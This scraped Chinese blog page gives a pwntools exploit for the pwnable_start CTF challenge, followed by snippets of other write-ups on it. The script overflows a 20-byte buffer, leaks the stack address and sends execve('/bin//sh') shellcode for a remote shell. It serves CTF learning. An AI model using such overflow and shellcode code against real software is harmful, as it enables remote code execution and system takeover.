pwnable_start

最新推荐文章于 2025-06-20 22:21:47 发布
最新推荐文章于 2025-06-20 22:21:47 发布
阅读量396 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pondzhang/article/details/114765897
本文介绍了一个CTF竞赛中的题目实现过程,通过构造特定的payload和shellcode绕过保护机制,实现远程代码执行。详细展示了如何利用程序漏洞进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

from pwn import *
loacl_elf = ELF("./start")
context.arch = loacl_elf.arch
#p = process("./start")
p = remote("node3.buuoj.cn",28802)
#gdb.attach(p, 'b* 0x08048060')

#shellcode=asm(shellcraft.sh())
shellcode = asm("xor ecx,ecx;\
                 xor edx,edx;\
				 push edx;\
				 push 0x68732f6e;\
				 push 0x69622f2f;\
				 mov ebx,esp;\
				 mov al,0xb;\
				 int 0x80")
#payload = 'a'*20  
payload = 'a'*20  + p32(0x08048087)

p.recvuntil("Let's start the CTF:")
p.send(payload)
esp_addr = u32(p.recv(4))
p.recv()
payload= 'a' * 20 + p32(esp_addr + 20) + shellcode
p.send(payload)


p.interactive()

 

BUUCTF pwnable_start
BengDouLove的博客
05-01 430
程序只有这么点代码,稍微分析一下 esp入栈,返回地址入栈(这里直接返回到exit函数,就退出程序了) 清空四个寄存器 这些东西被入栈,不知道是什么,往下看 这里调用了write函数,在汇编当中调用write函数的形式和寄存器是这样的 wtite ( fd , addr , length ) 三个参数对应的寄存器为 ebx ecx edx 将esp赋值给了ecx,说明要打...
BUUCTF pwnable_start心路历程
weixin_45441024的博客
11-28 4279
记第一篇pwn的做题心路历程 pwnable_start 我们把题目下载下来,在ubuntu里面进行一下检查,checksec+文件路径 看起来是一道非常其简单的题,接下来放到IDA里面查看一下: 我们来分段进行分析,首先 系统执行了如下命令: 程序push了一个esp,push了一个exit(退出程序) 紧接着执行了如下指令,这里说明一下xor eax,eax的值等于0,在这里程序将这四个寄存器的值都清空为0了 这里push了共计为20(0x14)个字节,至于具体是什么我也不知道 这里我们可以
pwnable_start | Buuoj Pwn
ULGANOY的博客
08-15 216
buuoj的pwnable_start题目记录
【二进制安全作业】250617课上作业4 - start
最新发布
一个博客
06-20 1011
作业3遇到了很严重的问题,一直没搞定,先略过了,要讲的东西也一起放到这里讲吧。这道题是 pawnable 的第一道题 start。这次使用新工具 pwndbg 讲解(代替 gdb)。还没安装的可以在环境搭建最下面的250616补充内容中找到。之前安装了一直也没有用,今天尝试了一下还是很舒服的,先做一些介绍。pwndbg 是 gdb 的插件,所以 gdb 里能用的,pwndbg 也都能用。内存搜索search <pattern>pattern:要搜索的内容。可以用来搜索程序包含的字符串。
[BUUCTF]PWN——pwnable_start
mcmuyanga的博客
12-05 1423
pwnable_start 附件 步骤: 例行检查,32位程序,什么保护都没开,首先想到的是ret2shellcode的方法 本地试运行一下,看看程序大概的情况 32位ida载入,没法f5,好在汇编不长,看得懂 一开始调用write函数输出了let’s start the ctf,4是write函数的调用号,之后的调用号是3,调用了read函数,我们知道dl这个寄存器是控制输入字符的多少的,也就是所我们可以输入0x3c个字符,也就是执行了 write(1,buf,0x14) read
pwnable.tw---start
杀生丸?不,其实我要的是桔梗
04-30 1656
Pwnable.tw—start 最近比赛玩了好几天的pwn,发现老是差点火候,开始正式刷刷Pwnable.tw看看。 题目分析: checksec : 第一次遇到什么防护都不开的程序,兴奋。 IDA: 题目只有start和exit。 检测栈有点问题,不能够F5,强行看汇编。。。 .text:08048060 public _start ....
pwnable_start(write up)
m0_73756460的博客
01-19 241
buu刷题 pwnable_start(write up)
(BUUCTF)pwnable_317
xy1458214551的博客
01-09 945
BUUCTF的pwnable_317题解
PWN passcode [pwnable.kr]CTF writeup题解系列5
重新启程
01-01 982
直接看题目: 连接服务器看看情况: root@mypwn:/ctf/work/pwnable.kr# ssh passcode@pwnable.kr -p2222 passcode@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | \|...
pwnable.tw第一题start
计算机小白的博客
08-09 5677
这应该是我做的第一道pwn的题了(虽然也是看了很多别人的WriteUp),想了两天,才终于弄清楚了,在这里记录一下。拿到手以后发现是一个ELF文件,就放进kali虚拟机里面运行一下先: 程序启动以后打印一段话,然后让你输入,就完事了。 再放入IDA中,观察: 检测栈有点问题,不能够F5,强行看汇编。。。 5个push是打印出来的那句话, Let’s start the CTF: 下面一句
pwnable.tw-start
qq_35661990的博客
10-05 1028
参考了好多文章才能大致理解shellcode 这题开始就有一个大坑 可以看到不同的checksec查看start文件会有不同的结果,就结果而言,GDB-PEDA的checksec很不靠谱。。我根本没有s命名的文件。。 所以,start是一个32位没有开启NX的程序,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行...
pwnable.tw 第一题之start
像初雪一样自由洒落
04-26 632
今天学长布置了作业,,,做这道题,,, 言承这次遇到的第一个情况,,,就是页面打开了,题目出不来。作为一名安全一份子,一直不会访问外网,流泪。 趁着这次机会,搞定了,参考博客:https://www.wonxun.net/share/444 然后我们来看题 32位的程序,程序什么也没开,,,感觉挺友善的哈 执行效果,,挺好就一个输入点,基本猜测就是栈溢出,,, 用id...
【pwn】pwnable_start --只有read和write函数的getshell
question55的博客
02-04 1044
addrlenfd'<'LINUX -
pwnable.tw - start
不急不躁
07-08 4265
首先安装 pwntools,在执行pip install --upgrade pwntools时出错 cannot import name main 要修改 /usr/bin/pip from pip import main 为 from pip import __main__ sys.exit(__main__._main()) 再次执行即可 安装 peda git cl...
BUUCTF--pwnable_start1
qq_30528603的博客
01-06 449
主要就2个功能,通过系统调用来执行读写功能,将字符串Let's start the CTF:输出,然后接收用户输入。也就是我们能刚好覆盖到返回地址,但是我的shellcode有0x18个字节。而且我们惊奇的发现,这两个值相差0x4,因此我们需要通过write函数将他泄露出来,紧着这我们的返回地址就有了,步骤shellocode就是要返回到布局的栈地址处执行。此时esp要索引到返回地址,将直接执行add esp,14h。存在栈溢出,那么这题的想法就是直接ret2shellcode了。
[BUUCTF]刷题:pwnable_start
zyxx_wjc的博客
07-06 340
BUUCTF:pwnable_start题解
pwnable.tw start writeup
jmp esp
09-27 1539
题目.text:08048060 .text:08048060 public _start .text:08048060 _start proc near .text:08048060 push esp .text:08048061 push offset _exit .te
[pwnable.tw] Start Write up
yym68686
02-18 266
Start checksec Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) 程序只有两个函数 _start _exit _start函数 .text:08048060 push esp # 将esp寄存器的值压入栈中,程序一开始什么都没有,esp就是栈顶 .text:080
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值